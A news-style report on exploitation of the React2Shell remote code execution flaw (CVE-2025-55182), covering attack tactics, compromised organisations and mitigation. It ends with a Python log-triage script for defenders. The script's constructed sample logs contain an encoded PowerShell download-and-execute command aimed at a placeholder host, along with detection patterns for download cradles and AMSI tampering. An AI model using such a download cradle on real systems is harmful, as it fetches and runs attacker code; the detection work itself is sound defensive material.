**Critical React2Shell Flaw Exploited to Breach 30 Organizations, Over 77k IP Addresses Vulnerable**

A critical vulnerability in the React framework, known as React2Shell, has been exploited to breach over 30 organizations across multiple sectors. The flaw, identified as CVE-2025-55182, affects all frameworks that implement React Server Components, including Next.js, and can be exploited via a single HTTP request.

Researchers have confirmed that attackers have already compromised numerous organizations using the React2Shell vulnerability. According to the Shadowserver internet watchdog group, more than 77,664 IP addresses are vulnerable to the flaw, with approximately 23,700 located in the United States.

**The Vulnerability**

React2Shell is an unauthenticated remote code execution vulnerability: an attacker who can reach the server can run arbitrary commands on it without any credentials. This is made possible by unsafe deserialization of client-controlled data inside React Server Components.

To fix the vulnerability, developers must update React to the latest version, rebuild their applications, and then redeploy them. The patch was released on December 3, but researchers have observed widespread exploitation of the flaw in the days following its disclosure.

**Exploitation Techniques**

Security researcher Maple3142 published a working proof-of-concept demonstrating remote command execution against unpatched servers on December 4. Soon after, scanning for the flaw accelerated as attackers and researchers began using the public exploit with automated tools.

GreyNoise recorded 181 distinct IP addresses attempting to exploit the flaw over the past 24 hours, with most of the traffic appearing automated. The scans are primarily originating from the Netherlands, China, the United States, Hong Kong, and a small number of other countries.

**Compromised Organizations**

Palo Alto Networks reports that more than 30 organizations have already been compromised through the React2Shell flaw. Attackers exploited the vulnerability to run commands, conduct reconnaissance, and attempt to steal AWS configuration and credential files.

These compromises include intrusions linked to known state-associated Chinese threat actors. Researchers and threat intelligence companies have observed widespread exploitation of the CVE-2025-55182 flaw since its disclosure.

**Attack Tactics**

GreyNoise reports that attackers frequently begin with PowerShell commands that perform a basic math function to confirm the device is vulnerable to the remote code execution flaw. These checks return predictable results while leaving minimal signs of exploitation. GreyNoise then observed the following:

  • Once remote code execution was confirmed, attackers executed base64-encoded PowerShell commands that download additional scripts directly into memory.
  • One observed command executes a second-stage PowerShell script from an external site (23[.]235[.]188[.]3), which is used to disable AMSI to bypass endpoint security and deploy additional payloads.

According to VirusTotal, the PowerShell script observed by GreyNoise installs a Cobalt Strike beacon on the targeted device, giving threat actors a foothold on the network. Amazon AWS threat intelligence teams also saw rapid exploitation hours after the disclosure of the React CVE-2025-55182 flaw.

**Mitigation and Response**

Given the severity of the React flaw, companies worldwide have rushed to install the patch and apply mitigations. Yesterday, Cloudflare rolled out emergency detections and mitigations for the flaw in its Web Application Firewall (WAF) in response to its widespread exploitation.

CISA has also added CVE-2025-55182 to the Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply patches by December 26, 2025, under Binding Operational Directive 22-01. Organizations using React Server Components or frameworks built on top of them are advised to apply updates immediately, rebuild and redeploy their applications, and review logs for signs of PowerShell or shell command execution.
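The last recommendation, reviewing logs for PowerShell or shell execution, can be turned into a first-pass triage rule built from the tactics described in this article: a shell spawned by the Node process, an -EncodedCommand payload, and download-cradle or AMSI strings inside the decoded payload. The example below is added here and is not code from the article, GreyNoise, or any vendor named; the key=value log format, the regexes, and the sample lines are assumptions constructed for the demonstration.

```python
import base64
import re

# Indicators drawn from the tactics described above; field layout, regexes and samples are this example's assumptions.
INDICATORS = {
    "download_cradle": re.compile(r"downloadstring|downloadfile|\biex\b|invoke-expression", re.I),
    "amsi_tamper": re.compile(r"amsi", re.I),
}
ENCODED = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)  # -EncodedCommand and short forms
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')  # key=value or key="value with spaces"
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "sh", "bash"}
def parse_line(line):
    return {k: v.strip('"') for k, v in FIELD.findall(line)}

def decode_encoded(cmdline):
    """-EncodedCommand carries base64 of UTF-16LE text; return that text, or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(line):
    """Return the sorted indicator names hit by one log line ([] = nothing flagged)."""
    rec = parse_line(line)
    cmd = rec.get("cmdline", "")
    hits = set()
    # A web-app runtime spawning a shell is the footprint of the RCE itself.
    if rec.get("parent", "").lower() in ("node", "node.exe") and rec.get("image", "").lower() in SHELLS:
        hits.add("shell_from_node")
    decoded = decode_encoded(cmd)
    if decoded is not None:
        hits.add("encoded_powershell")
    text = decoded if decoded is not None else cmd  # inspect the decoded payload when there is one
    hits.update(name for name, pat in INDICATORS.items() if pat.search(text))
    return sorted(hits)

# Constructed sample telemetry (not real captures); the second line encodes STAGE2 as PowerShell expects.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage2.ps1')"
SAMPLE_LOG = [
    'ts=2025-12-05T10:14:02Z host=web01 parent=node.exe image=powershell.exe cmdline="powershell -c 1337*2"',
    'ts=2025-12-05T10:14:09Z host=web01 parent=node.exe image=powershell.exe cmdline="powershell -nop -w hidden -enc '
    + base64.b64encode(STAGE2.encode("utf-16-le")).decode() + '"',
    'ts=2025-12-05T10:20:41Z host=web01 parent=explorer.exe image=powershell.exe cmdline="powershell -File C:\\ops\\backup.ps1"',
]
def scan(lines=SAMPLE_LOG):  # (timestamp, indicators) for each line; scan() alone runs the sample through the rules
    return [(parse_line(l).get("ts"), classify(l)) for l in lines]
```

The "1337*2" check on its own would pass an indicator-only rule, which is why the parent-process condition matters: the arithmetic probe is invisible to string matching but not to process lineage.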